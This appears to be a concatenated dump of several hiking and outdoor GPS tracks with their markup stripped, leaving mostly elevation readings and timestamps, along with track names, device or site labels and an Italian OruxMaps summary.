+1073.9999873876695
+
+
+1071.2999239355515
+
+
+1054.099998518887
+
+
+1056.3000158204122
+
+
+1064.2157838619346
+
+
+1069.9000021144118
+
+
+1074.4999753349905
+
+
+1078.99997455609
+
+
+1087.0000185500937
+
+
+1094.5999789975447
+
+
+1102.7999958241112
+
+
+1102.0
+
+
+1102.3033745822945
+
+
+1098.899953153284
+
+
+1076.600023596457
+
+
+1073.6
+
+
+1072.5000037937007
+
+
+1072.8000168290948
+
+
+1073.700000775371
+
+
+1073.5
+
+
+1073.4
+
+
+1074.699990673333
+
+
+1074.6000008043936
+
+
+1079.3649046457926
+
+
+1073.8000949114025
+
+
+1042.8
+
+
+1012.0859602027043
+
+
+1007.7648542576775
+
+
+1000.5001073670418
+
+
+995.5
+
+
+990.6
+
+
+968.1
+
+
+996.2997118230159
+
+
+998.8000101437527
+
+
+1008.3
+
+
+1004.8
+ "
+"
+
+2016-07-04T10:45:10Z
+
+
+2016-07-02 08:32
+
+
+1253.0
+2016-07-02T06:33:07Z
+
+1283.0
+2016-07-02T06:34:18Z
+
+1292.0
+2016-07-02T06:35:17Z
+
+1302.0
+2016-07-02T06:36:00Z
+
+1312.0
+2016-07-02T06:37:19Z
+
+1319.0
+2016-07-02T06:38:50Z
+
+1312.0
+2016-07-02T06:39:21Z
+
+1335.0
+2016-07-02T06:41:48Z
+
+1360.0
+2016-07-02T06:45:30Z
+
+1371.0
+2016-07-02T06:45:58Z
+
+1397.0
+2016-07-02T06:47:20Z
+
+1424.0
+2016-07-02T06:48:13Z
+
+1456.0
+2016-07-02T06:54:01Z
+
+1460.0
+2016-07-02T06:55:59Z
+
+1499.0
+2016-07-02T07:00:03Z
+
+1530.0
+2016-07-02T07:02:15Z
+
+1541.0
+2016-07-02T07:03:11Z
+
+1554.0
+2016-07-02T07:04:07Z
+
+1570.0
+2016-07-02T07:10:35Z
+
+1576.0
+2016-07-02T07:11:31Z
+
+1582.0
+2016-07-02T07:12:07Z
+
+1585.0
+2016-07-02T07:12:25Z
+
+1594.0
+2016-07-02T07:12:43Z
+
+1601.0
+2016-07-02T07:13:02Z
+
+1605.0
+2016-07-02T07:13:21Z
+
+1608.0
+2016-07-02T07:13:39Z
+
+1615.0
+2016-07-02T07:14:19Z
+
+1631.0
+2016-07-02T07:15:11Z
+
+1640.0
+2016-07-02T07:16:12Z
+
+1639.0
+2016-07-02T07:16:31Z
+
+1648.0
+2016-07-02T07:17:10Z
+
+1651.0
+2016-07-02T07:17:28Z
+
+1659.0
+2016-07-02T07:18:07Z
+
+1662.0
+2016-07-02T07:18:27Z
+
+1668.0
+2016-07-02T07:19:06Z
+
+1678.0
+2016-07-02T07:20:02Z
+
+1680.0
+2016-07-02T07:20:20Z
+
+1689.0
+2016-07-02T07:21:21Z
+
+1694.0
+2016-07-02T07:21:37Z
+
+1697.0
+2016-07-02T07:21:53Z
+
+
+1698.0
+2016-07-02T07:22:15Z
+
+1701.0
+2016-07-02T07:22:32Z
+
+
+1705.0
+2016-07-02T07:22:48Z
+
+
+1708.0
+2016-07-02T07:23:04Z
+
+
+1711.0
+2016-07-02T07:23:21Z
+
+
+1717.0
+2016-07-02T07:23:56Z
+
+
+1717.0
+2016-07-02T07:24:11Z
+
+
+
+1723.0
+2016-07-02T07:24:45Z
+
+
+1725.0
+2016-07-02T07:25:03Z
+
+
+1727.0
+2016-07-02T07:25:21Z
+
+
+1730.0
+2016-07-02T07:25:41Z
+
+
+
+1739.0
+2016-07-02T07:26:21Z
+
+
+
+1741.0
+2016-07-02T07:26:56Z "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-11-20T15:52:18Z
+
+
+Ludwigshöhe
+
+
+
+
+
+
+3623.38
+2016-08-25T05:20:45Z
+
+
+3735.19
+2016-08-25T05:26:19Z
+
+
+3821.61
+2016-08-25T05:41:46Z
+
+
+3865.1
+2016-08-25T05:50:36Z
+
+
+3985.03
+2016-08-25T06:11:51Z
+
+
+4009.31
+2016-08-25T06:23:17Z
+
+
+4040.13
+2016-08-25T06:29:21Z
+
+
+4072.59
+2016-08-25T06:37:40Z
+
+
+4124.68
+2016-08-25T06:47:32Z
+
+
+4141.66
+2016-08-25T06:51:55Z
+
+
+4148.97
+2016-08-25T06:52:55Z
+
+
+4172.86
+2016-08-25T07:00:06Z
+
+
+4202.2
+2016-08-25T07:07:19Z
+
+
+4223.34
+2016-08-25T07:12:48Z
+
+
+4231.86
+2016-08-25T07:14:16Z
+
+
+4272.01
+2016-08-25T07:25:31Z
+
+
+4286.42
+2016-08-25T07:39:03Z
+
+
+4282.03
+2016-08-25T07:56:43Z
+
+
+4300.25
+2016-08-25T08:02:13Z
+
+
+4306.96
+2016-08-25T08:04:58Z
+
+
+4344.04
+2016-08-25T08:19:30Z
+
+
+4312.75
+2016-08-25T08:25:08Z
+
+
+4308.39
+2016-08-25T08:26:11Z
+
+
+4302.49
+2016-08-25T08:34:29Z
+
+
+4251.19
+2016-08-25T08:41:32Z
+
+
+4251.98
+2016-08-25T08:43:37Z
+
+
+4256.13
+2016-08-25T08:46:32Z
+
+
+4251.84
+2016-08-25T09:02:35Z
+
+
+4248.33
+2016-08-25T09:03:36Z
+
+
+4107.98
+2016-08-25T09:21:16Z
+
+
+4076.48
+2016-08-25T09:26:26Z
+
+
+4033.77
+2016-08-25T09:32:57Z
+
+
+4019.14
+2016-08-25T09:34:42Z
+
+
+3918.57
+2016-08-25T09:42:09Z
+
+
+3848.9
+2016-08-25T09:46:58Z
+
+
+3760.21
+2016-08-25T09:52:15Z
+
+
+3717.02
+2016-08-25T09:55:07Z
+
+
+3696.65
+2016-08-25T09:57:59Z
+
+
+3661.43
+2016-08-25T10:01:18Z
+
+
+3650.44
+2016-08-25T10:02:07Z
+
+
+3629.29
+2016-08-25T10:04:02Z
+
+
+3632.67
+2016-08-25T10:16:42Z
+
+
+3605.19
+2016-08-25T11:45:24Z
+
+
+3597.8
+2016-08-25T11:46:51Z
+
+
+3577.22
+2016-08-25T11:49:10Z
+
+
+3536.49
+2016-08-25T11:53:57Z
+
+
+3528.12
+2016-08-25T11:54:36Z
+
+
+3496.71
+2016-08-25T11:58:35Z
+
+
+3490.77
+2016-08-25T12:00:16Z
+
+
+3485.81
+2016-08-25T12:01:20Z
+
+
+3459.62
+2016-08-25T12:12:38Z
+
+
+3459.35
+2016-08-25T12:14:54Z
+ "
+"
+
+
+Downloader: 2016-10-11T19:10:07 # 79523 # gpstracks # 79.199.23.110
+Touren-Titel
+
+Christian Steiner
+
+
+GPS-Tracks.com
+
+http://www.GPS-Tracks.com
+
+
+
+70-0 Touren_Titel
+
+
+
+
+
+
+
+2726.0
+2016-09-22T12:49:52Z
+
+
+2714.0
+2016-09-22T12:49:54Z
+
+
+2714.0
+2016-09-22T12:49:56Z
+
+
+2727.0
+2016-09-22T12:50:16Z
+
+
+2740.0
+2016-09-22T12:50:26Z
+
+
+2766.0
+2016-09-22T12:50:40Z
+
+
+2790.0
+2016-09-22T12:50:52Z
+
+
+2804.0
+2016-09-22T12:51:03Z
+
+
+2820.0
+2016-09-22T12:51:10Z
+
+
+2850.0
+2016-09-22T12:51:16Z
+
+
+2878.0
+2016-09-22T12:51:26Z
+
+
+2891.0
+2016-09-22T12:51:28Z
+
+
+2955.0
+2016-09-22T12:51:46Z
+
+
+2959.0
+2016-09-22T12:51:50Z
+
+
+2982.0
+2016-09-22T12:51:57Z
+
+
+3012.0
+2016-09-22T12:52:07Z
+
+
+3068.0
+2016-09-22T12:52:21Z
+
+
+3087.0
+2016-09-22T12:52:29Z
+
+
+3088.0
+2016-09-22T12:52:33Z
+
+
+3119.0
+2016-09-22T12:52:52Z
+
+
+3162.0
+2016-09-22T12:53:11Z
+
+
+3216.0
+2016-09-22T12:53:36Z
+
+
+3224.0
+2016-09-22T12:53:44Z
+
+
+3233.0
+2016-09-22T12:53:45Z
+
+
+3231.0
+2016-09-22T12:53:48Z
+
+
+3239.0
+2016-09-22T12:53:50Z
+
+
+3244.0
+2016-09-22T12:53:52Z
+
+
+3252.0
+2016-09-22T12:53:53Z
+
+
+3269.0
+2016-09-22T12:53:58Z
+
+
+3275.0
+2016-09-22T12:54:05Z
+
+
+3298.0
+2016-09-22T12:54:11Z
+
+
+3302.0
+2016-09-22T12:54:15Z
+
+
+3315.0
+2016-09-22T12:54:20Z
+
+
+3352.0
+2016-09-22T12:54:29Z
+
+
+3398.0
+2016-09-22T12:54:37Z
+
+
+3416.0
+2016-09-22T12:54:43Z
+
+
+3424.0
+2016-09-22T12:54:47Z
+
+
+3434.0
+2016-09-22T12:54:49Z
+
+
+3455.0
+2016-09-22T12:54:56Z
+
+
+3476.0
+2016-09-22T12:55:01Z
+
+
+3508.0
+2016-09-22T12:55:08Z
+
+
+3589.0
+2016-09-22T12:55:31Z
+
+
+3643.0
+2016-09-22T12:55:37Z
+
+
+3669.0
+2016-09-22T12:55:39Z
+
+
+3703.0
+2016-09-22T12:55:48Z
+
+
+3704.0
+2016-09-22T12:56:06Z
+
+
+3710.0
+2016-09-22T12:56:08Z
+
+
+3731.0
+2016-09-22T12:56:14Z
+
+
+3734.0
+2016-09-22T12:56:18Z
+
+
+3760.0
+2016-09-22T12:56:24Z
+
+
+3788.0
+2016-09-22T12:56:27Z
+
+
+3880.0
+2016-09-22T12:56:45Z
+
+
+3892.0
+2016-09-22T12:56:52Z
+
+
+3901.0
+2016-09-22T12:56:57Z
+
+
+3915.0
+2016-09-22T12:57:02Z
+
+
+3964.0
+2016-09-22T12:57:30Z
+
+
+3968.0
+2016-09-22T12:57:37Z
+
+
+3983.0
+2016-09-22T12:58:04Z
+ "
+"
+
+
+verenaschlucht, geführt
+
+
+
+
+
+
+verenaschlucht, geführt
+
+
+
+459.79991284049777
+
+
+456.6
+
+
+459.2000795059057
+
+
+456.89999799907497
+
+
+458.3
+
+
+457.19999642573833
+
+
+457.1
+
+
+458.2000024671752
+
+
+459.0999933445369
+
+
+461.60001082674677
+
+
+465.4
+
+
+468.79999855476467
+
+
+470.5999811683176
+
+
+475.69998892764113
+
+
+479.4999959046646
+
+
+483.5999791040839
+
+
+488.99998768188004
+
+
+490.600000373319
+
+
+491.2
+
+
+497.59995586767826
+
+
+502.39984882936403
+
+
+493.29995243723425
+
+
+493.29999461442304
+
+
+499.79994607050514
+
+
+504.89999730516996
+
+
+504.4
+
+
+505.49999258612496
+
+
+504.2999930235563
+
+
+502.6000047395312
+
+
+505.39998809513077
+
+
+496.70006606477466
+
+
+474.8999376872744
+
+
+465.19994603075514
+
+
+459.4
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2015-01-09T14:17:00Z
+
+GPSies Track on GPSies.com
+
+
+1088.0
+2010-01-01T00:00:00Z
+
+
+1088.0
+2010-01-01T00:00:32Z
+
+
+1085.0
+2010-01-01T00:01:12Z
+
+
+1087.0
+2010-01-01T00:01:45Z
+
+
+1091.0
+2010-01-01T00:02:39Z
+
+
+1115.0
+2010-01-01T00:03:38Z
+
+
+1117.0
+2010-01-01T00:04:15Z
+
+
+1114.0
+2010-01-01T00:05:01Z
+
+
+1137.0
+2010-01-01T00:06:05Z
+
+
+1150.0
+2010-01-01T00:07:20Z
+
+
+1165.0
+2010-01-01T00:08:29Z
+
+
+1183.0
+2010-01-01T00:09:06Z
+
+
+1182.0
+2010-01-01T00:09:23Z
+
+
+1203.0
+2010-01-01T00:10:27Z
+
+
+1212.0
+2010-01-01T00:11:10Z
+
+
+1226.0
+2010-01-01T00:11:28Z
+
+
+1218.0
+2010-01-01T00:12:01Z
+
+
+1220.0
+2010-01-01T00:12:29Z
+
+
+1216.0
+2010-01-01T00:12:56Z
+
+
+1229.0
+2010-01-01T00:13:31Z
+
+
+1240.0
+2010-01-01T00:14:03Z
+
+
+1247.0
+2010-01-01T00:14:41Z
+
+
+1243.0
+2010-01-01T00:15:14Z
+
+
+1251.0
+2010-01-01T00:15:47Z
+
+
+1266.0
+2010-01-01T00:16:27Z
+
+
+1273.0
+2010-01-01T00:17:04Z
+
+
+1287.0
+2010-01-01T00:17:26Z
+
+
+1285.0
+2010-01-01T00:17:54Z
+
+
+1292.0
+2010-01-01T00:18:13Z
+
+
+1324.0
+2010-01-01T00:19:04Z
+
+
+1341.0
+2010-01-01T00:19:37Z
+
+
+1369.0
+2010-01-01T00:20:16Z
+
+
+1360.0
+2010-01-01T00:21:07Z
+
+
+1392.0
+2010-01-01T00:21:39Z
+
+
+1368.0
+2010-01-01T00:22:15Z
+
+
+1385.0
+2010-01-01T00:22:59Z
+
+
+1408.0
+2010-01-01T00:23:48Z
+
+
+1413.0
+2010-01-01T00:24:33Z
+
+
+1415.0
+2010-01-01T00:25:03Z
+
+
+1421.0
+2010-01-01T00:26:04Z
+
+
+1446.0
+2010-01-01T00:26:48Z
+
+
+1440.0
+2010-01-01T00:27:05Z
+
+
+1472.0
+2010-01-01T00:27:40Z
+
+
+1491.0
+2010-01-01T00:28:29Z
+
+
+1535.0
+2010-01-01T00:29:12Z
+
+
+1518.0
+2010-01-01T00:29:45Z
+
+
+1541.0
+2010-01-01T00:30:15Z
+
+
+1557.0
+2010-01-01T00:31:03Z
+
+
+1576.0
+2010-01-01T00:31:45Z
+
+
+1591.0
+2010-01-01T00:32:02Z
+
+
+1606.0
+2010-01-01T00:32:16Z
+
+
+1620.0
+2010-01-01T00:32:46Z
+
+
+1636.0
+2010-01-01T00:33:15Z
+
+
+1677.0
+2010-01-01T00:34:09Z
+
+
+1701.0
+2010-01-01T00:35:07Z
+
+
+1710.0
+2010-01-01T00:35:59Z
+
+
+1716.0
+2010-01-01T00:36:47Z
+
+
+1716.0
+2010-01-01T00:37:32Z
+
+
+1720.0
+2010-01-01T00:38:09Z
+
+
+1721.0
+2010-01-01T00:38:31Z
+
+
+1720.0
+2010-01-01T00:38:52Z
+
+
+1718.0
+2010-01-01T00:38:56Z
+
+
+1732.0
+2010-01-01T00:39:25Z
+
+
+1750.0
+2010-01-01T00:39:54Z
+
+
+1785.0
+2010-01-01T00:40:19Z
+
+
+1785.0
+2010-01-01T00:40:53Z
+
+
+1819.0
+2010-01-01T00:41:34Z
+
+
+1851.0
+2010-01-01T00:42:08Z
+ "
+"
+
+
+
+
+
+
+GPS dump for www.flightlog.org
+2015-11-02T20:26:17Z
+
+
+Track 001
+
+
+
+1015.2
+2015-10-25T07:42:33Z
+
+
+997.0
+2015-10-25T07:52:33Z
+
+
+997.0
+2015-10-25T07:53:33Z
+
+
+995.1
+2015-10-25T07:55:03Z
+
+
+996.0
+2015-10-25T07:55:33Z
+
+
+1005.6
+2015-10-25T07:57:33Z
+
+
+1007.1
+2015-10-25T07:59:03Z
+
+
+1007.6
+2015-10-25T07:59:33Z
+
+
+1014.8
+2015-10-25T08:00:33Z
+
+
+1067.2
+2015-10-25T08:05:33Z
+
+
+1091.2
+2015-10-25T08:10:03Z
+
+
+1099.8
+2015-10-25T08:11:33Z
+
+
+1110.9
+2015-10-25T08:14:03Z
+
+
+1148.4
+2015-10-25T08:17:33Z
+
+
+1159.4
+2015-10-25T08:20:03Z
+
+
+1170.0
+2015-10-25T08:20:33Z
+
+
+1178.2
+2015-10-25T08:21:03Z
+
+
+1196.5
+2015-10-25T08:23:33Z
+
+
+1205.6
+2015-10-25T08:24:33Z
+
+
+1222.9
+2015-10-25T08:27:03Z
+
+
+1247.4
+2015-10-25T08:31:33Z
+
+
+1299.8
+2015-10-25T08:39:03Z
+
+
+1323.8
+2015-10-25T08:42:33Z
+
+
+1338.2
+2015-10-25T08:44:03Z
+
+
+1339.7
+2015-10-25T08:47:03Z
+
+
+1351.7
+2015-10-25T08:48:33Z
+
+
+1355.6
+2015-10-25T08:49:33Z
+
+
+1365.6
+2015-10-25T08:51:03Z
+
+
+1395.4
+2015-10-25T08:54:03Z
+
+
+1404.1
+2015-10-25T08:55:03Z
+
+
+1411.8
+2015-10-25T08:56:33Z
+
+
+1471.4
+2015-10-25T09:03:33Z
+
+
+1476.2
+2015-10-25T09:04:33Z
+
+
+1481.5
+2015-10-25T09:05:33Z
+
+
+1504.1
+2015-10-25T09:09:03Z
+
+
+1518.0
+2015-10-25T09:12:03Z
+
+
+1538.7
+2015-10-25T09:14:03Z
+
+
+1549.3
+2015-10-25T09:15:03Z
+
+
+1580.0
+2015-10-25T09:19:03Z
+
+
+1593.0
+2015-10-25T09:20:33Z
+
+
+1598.3
+2015-10-25T09:21:03Z
+
+
+1613.2
+2015-10-25T09:23:03Z
+
+
+1623.3
+2015-10-25T09:25:03Z
+
+
+1627.6
+2015-10-25T09:37:03Z
+
+
+1652.1
+2015-10-25T09:39:33Z
+
+
+1666.5
+2015-10-25T09:41:33Z
+
+
+1688.6
+2015-10-25T09:44:03Z
+
+
+1720.4
+2015-10-25T09:48:33Z
+
+
+1732.4
+2015-10-25T09:50:33Z
+
+
+1737.7
+2015-10-25T09:51:33Z
+
+
+1761.7
+2015-10-25T09:54:33Z
+
+
+1770.8
+2015-10-25T09:58:03Z
+
+
+1788.1
+2015-10-25T10:05:33Z
+
+
+1825.6
+2015-10-25T10:11:03Z
+
+
+1867.9
+2015-10-25T10:18:03Z
+
+
+1919.8
+2015-10-25T10:24:33Z
+
+
+1941.5
+2015-10-25T10:27:03Z
+
+
+1967.4
+2015-10-25T10:32:03Z
+
+
+1975.1
+2015-10-25T10:33:33Z
+
+
+2029.4
+2015-10-25T10:45:33Z
+
+
+2031.4
+2015-10-25T11:24:33Z
+
+
+2015.5
+2015-10-25T11:37:03Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2012-08-13T21:51:46Z
+
+
+Belacker-11AUG12
+
+
+
+
+
+
+662.5507813
+
+
+685.859375
+
+
+691.4296875
+
+
+703.3632813
+
+
+727.8515625
+
+
+754.9882813
+
+
+773.9140625
+
+
+773.578125
+
+
+776.8007813
+
+
+779.234375
+
+
+781.3125
+
+
+777.5742188
+
+
+772.90625
+
+
+778.1796875
+
+
+793.0546875
+
+
+795.3945313
+
+
+808.8945313
+
+
+812.03125
+
+
+827.28125
+
+
+825.8164063
+
+
+843.8242188
+
+
+878.5195313
+
+
+916.4882813
+
+
+923.6601563
+
+
+954.8671875
+
+
+951.890625
+
+
+947.6484375
+
+
+966.8046875
+
+
+976.3242188
+
+
+975.6132813
+
+
+981.0429688
+
+
+981.6992188
+
+
+990.125
+
+
+997.578125
+
+
+1004.7734375
+
+
+1013.2421875
+
+
+1037.0
+
+
+1019.3007813
+
+
+997.28125
+
+
+988.5078125
+
+
+985.140625
+
+
+984.4375
+
+
+981.0
+
+
+981.0
+
+
+975.2578125
+
+
+971.609375
+
+
+959.5390625
+
+
+962.6054688
+
+
+963.7460938
+
+
+968.7929688
+
+
+963.7578125
+
+
+970.46875
+
+
+951.7851563
+
+
+933.3242188
+
+
+923.6484375
+
+
+922.2226563
+
+
+882.9453125
+
+
+862.0625
+
+
+823.5273438
+
+
+821.515625
+
+
+788.3242188
+
+
+751.3359375
+
+
+713.5429688
+
+
+695.2070313
+
+
+696.1328125
+
+
+680.9882813
+
+
+678.2578125
+
+
+682.8984375
+
+
+681.9492188
+
+
+669.5039063
+
+
+661.2773438
+
+
+657.1953125
+
+
+663.0039063
+
+
+662.5585938
+ "
+"
+
+
+
+
+
+
+2015-02-21T09:00:00Z
+
+24H Monte Prealba
+
+
+
+617.8
+2015-02-21T09:00:00Z
+
+
+631.2
+2015-02-21T09:01:03Z
+
+
+642.8
+2015-02-21T09:01:45Z
+
+
+650.2
+2015-02-21T09:02:17Z
+
+
+662.0
+2015-02-21T09:03:09Z
+
+
+665.2
+2015-02-21T09:03:21Z
+
+
+680.0
+2015-02-21T09:04:15Z
+
+
+699.6
+2015-02-21T09:05:26Z
+
+
+713.0
+2015-02-21T09:06:19Z
+
+
+722.0
+2015-02-21T09:06:55Z
+
+
+729.6
+2015-02-21T09:07:36Z
+
+
+733.0
+2015-02-21T09:08:02Z
+
+
+743.4
+2015-02-21T09:08:46Z
+
+
+772.2
+2015-02-21T09:10:49Z
+
+
+782.8
+2015-02-21T09:11:29Z
+
+
+795.2
+2015-02-21T09:12:19Z
+
+
+804.0
+2015-02-21T09:12:59Z
+
+
+814.0
+2015-02-21T09:13:47Z
+
+
+819.4
+2015-02-21T09:15:25Z
+
+
+841.4
+2015-02-21T09:17:50Z
+
+
+854.8
+2015-02-21T09:18:58Z
+
+
+859.4
+2015-02-21T09:19:25Z
+
+
+861.2
+2015-02-21T09:19:42Z
+
+
+891.6
+2015-02-21T09:22:19Z
+
+
+900.2
+2015-02-21T09:22:58Z
+
+
+929.4
+2015-02-21T09:25:13Z
+
+
+959.8
+2015-02-21T09:28:26Z
+
+
+984.4
+2015-02-21T09:30:36Z
+
+
+1003.2
+2015-02-21T09:32:03Z
+
+
+1029.8
+2015-02-21T09:34:10Z
+
+
+1050.6
+2015-02-21T09:35:59Z
+
+
+1066.2
+2015-02-21T09:37:17Z
+
+
+1086.4
+2015-02-21T09:38:53Z
+
+
+1096.8
+2015-02-21T09:39:35Z
+
+
+1119.8
+2015-02-21T09:41:30Z
+
+
+1133.2
+2015-02-21T09:42:42Z
+
+
+1122.2
+2015-02-21T09:43:29Z
+
+
+1105.2
+2015-02-21T09:44:14Z
+
+
+1087.8
+2015-02-21T09:45:06Z
+
+
+1084.6
+2015-02-21T09:45:13Z
+
+
+1067.8
+2015-02-21T09:46:45Z
+
+
+1047.8
+2015-02-21T09:47:55Z
+
+
+1029.0
+2015-02-21T09:49:17Z
+
+
+1015.8
+2015-02-21T09:50:01Z
+
+
+1004.0
+2015-02-21T09:50:36Z
+
+
+981.4
+2015-02-21T09:51:51Z
+
+
+960.8
+2015-02-21T09:53:02Z
+
+
+948.0
+2015-02-21T09:53:51Z
+
+
+924.4
+2015-02-21T09:54:47Z
+
+
+915.4
+2015-02-21T09:55:01Z
+
+
+883.0
+2015-02-21T09:56:32Z
+
+
+870.2
+2015-02-21T09:57:51Z
+
+
+855.4
+2015-02-21T09:58:40Z
+
+
+841.4
+2015-02-21T09:59:11Z
+
+
+814.8
+2015-02-21T10:00:16Z
+
+
+817.0
+2015-02-21T10:00:59Z
+
+
+814.4
+2015-02-21T10:01:35Z
+
+
+807.8
+2015-02-21T10:01:57Z
+
+
+797.6
+2015-02-21T10:02:22Z
+
+
+774.4
+2015-02-21T10:03:04Z
+
+
+748.4
+2015-02-21T10:03:53Z
+
+
+735.0
+2015-02-21T10:04:18Z
+
+
+729.0
+2015-02-21T10:04:43Z
+
+
+725.2
+2015-02-21T10:04:57Z
+
+
+720.2
+2015-02-21T10:05:07Z
+
+
+702.2
+2015-02-21T10:05:42Z
+
+
+686.8
+2015-02-21T10:06:14Z
+
+
+669.6
+2015-02-21T10:06:45Z
+
+
+665.0
+2015-02-21T10:06:53Z
+
+
+653.0
+2015-02-21T10:07:20Z
+
+
+645.8
+2015-02-21T10:07:35Z
+
+
+639.6
+2015-02-21T10:07:46Z
+
+
+632.8
+2015-02-21T10:07:57Z
+
+
+620.2
+2015-02-21T10:08:44Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+2016-01-16 08:53
+
+
+
+
+
+OruxMaps
+2016-01-16T07:53:30Z
+
+
+2016-01-16 08:53
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Nome: 2016-01-16 08:53</h2><br /><p>Orario inizio: 01/16/2016 08:57</p><p>Orario fine: 01/16/2016 14:01</p><p>Distanza: 5,1km (05:03)</p><p>Tempo movimento: 00:53</p><p>Velocità media: 1km/h</p><p>Velocità media mov.: 5,8km/h</p><p>Max. Velocità: 5,4km/h</p><p>Altitudine minima: 1798m</p><p>Altitudine massima: 2369m</p><p>Velocità di salita: 193,6m/h</p><p>Velocità di discesa: -358,2m/h</p><p>Dislivello positivo: 581m</p><p>Perdita di elevazione: -720m</p><p>Tempo di salita: 03:00</p><p>Tempo di discesa: 02:00</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Non definito
+
+
+
+
+
+1938.42
+2016-01-16T07:57:56Z
+
+
+1862.58
+2016-01-16T08:03:21Z
+
+
+1870.32
+2016-01-16T08:05:27Z
+
+
+1894.74
+2016-01-16T08:11:23Z
+
+
+1918.83
+2016-01-16T08:16:03Z
+
+
+1931.42
+2016-01-16T08:18:21Z
+
+
+1958.57
+2016-01-16T08:22:56Z
+
+
+1968.29
+2016-01-16T08:27:36Z
+
+
+1974.06
+2016-01-16T08:30:53Z
+
+
+1978.13
+2016-01-16T08:33:31Z
+
+
+1965.38
+2016-01-16T08:34:25Z
+
+
+1931.64
+2016-01-16T08:46:04Z
+
+
+1937.18
+2016-01-16T08:54:24Z
+
+
+1935.23
+2016-01-16T09:01:27Z
+
+
+1973.52
+2016-01-16T09:10:08Z
+
+
+2004.35
+2016-01-16T09:19:00Z
+
+
+2027.41
+2016-01-16T09:24:03Z
+
+
+2067.51
+2016-01-16T09:45:24Z
+
+
+2094.93
+2016-01-16T09:54:31Z
+
+
+2120.98
+2016-01-16T09:59:13Z
+
+
+2151.5
+2016-01-16T10:11:27Z
+
+
+2173.33
+2016-01-16T10:15:10Z
+
+
+2218.33
+2016-01-16T10:30:25Z
+
+
+2228.46
+2016-01-16T10:33:13Z
+
+
+2232.17
+2016-01-16T10:39:36Z
+
+
+2258.19
+2016-01-16T10:46:31Z
+
+
+2307.67
+2016-01-16T10:54:20Z
+
+
+2337.66
+2016-01-16T11:03:24Z
+
+
+2357.82
+2016-01-16T11:15:56Z
+
+
+2369.8
+2016-01-16T11:21:17Z
+
+
+2336.18
+2016-01-16T11:24:57Z
+
+
+2314.08
+2016-01-16T11:25:57Z
+
+
+2319.63
+2016-01-16T11:29:49Z
+
+
+2309.86
+2016-01-16T11:33:28Z
+
+
+2255.53
+2016-01-16T11:45:36Z
+
+
+2239.11
+2016-01-16T11:48:04Z
+
+
+2227.64
+2016-01-16T11:48:34Z
+
+
+2221.63
+2016-01-16T11:52:36Z
+
+
+2223.45
+2016-01-16T11:54:46Z
+
+
+2189.47
+2016-01-16T12:02:30Z
+
+
+2159.1
+2016-01-16T12:06:23Z
+
+
+2134.88
+2016-01-16T12:08:12Z
+
+
+2118.41
+2016-01-16T12:10:27Z
+
+
+2098.6
+2016-01-16T12:13:11Z
+
+
+2081.47
+2016-01-16T12:13:58Z
+
+
+2070.22
+2016-01-16T12:15:06Z
+
+
+2057.11
+2016-01-16T12:18:06Z
+
+
+2042.42
+2016-01-16T12:19:48Z
+
+
+2023.44
+2016-01-16T12:23:23Z
+
+
+1975.37
+2016-01-16T12:32:15Z
+
+
+1944.93
+2016-01-16T12:36:25Z
+
+
+1923.9
+2016-01-16T12:39:44Z
+
+
+1915.69
+2016-01-16T12:41:26Z
+
+
+1906.22
+2016-01-16T12:42:55Z
+
+
+1839.92
+2016-01-16T12:52:49Z
+
+
+1814.17
+2016-01-16T12:58:43Z
+
+
+1801.48
+2016-01-16T13:00:29Z
+
+
+1803.78
+2016-01-16T13:01:47Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-08-21T10:34:21Z
+
+21-AUG-15 12:34:19
+
+
+
+
+
+2514.95
+2015-08-21T08:28:30Z
+
+
+2508.7
+2015-08-21T08:29:34Z
+
+
+2517.35
+2015-08-21T08:30:20Z
+
+
+2521.68
+2015-08-21T08:30:44Z
+
+
+2533.21
+2015-08-21T08:31:57Z
+
+
+2543.79
+2015-08-21T08:33:08Z
+
+
+2555.8
+2015-08-21T08:34:26Z
+
+
+2570.22
+2015-08-21T08:36:07Z
+
+
+2578.39
+2015-08-21T08:37:00Z
+
+
+2604.35
+2015-08-21T08:40:15Z
+
+
+2613.48
+2015-08-21T08:42:55Z
+
+
+2620.69
+2015-08-21T08:46:17Z
+
+
+2618.29
+2015-08-21T08:48:59Z
+
+
+2614.92
+2015-08-21T08:50:16Z
+
+
+2617.81
+2015-08-21T08:53:28Z
+
+
+2617.81
+2015-08-21T08:55:04Z
+
+
+2617.33
+2015-08-21T08:55:38Z
+
+
+2610.6
+2015-08-21T08:56:45Z
+
+
+2617.81
+2015-08-21T08:59:03Z
+
+
+2629.82
+2015-08-21T09:01:31Z
+
+
+2634.63
+2015-08-21T09:05:29Z
+
+
+2650.01
+2015-08-21T09:10:32Z
+
+
+2649.05
+2015-08-21T09:13:29Z
+
+
+2631.27
+2015-08-21T09:15:58Z
+
+
+2611.08
+2015-08-21T09:20:38Z
+
+
+2641.84
+2015-08-21T09:24:56Z
+
+
+2629.34
+2015-08-21T09:27:59Z
+
+
+2625.5
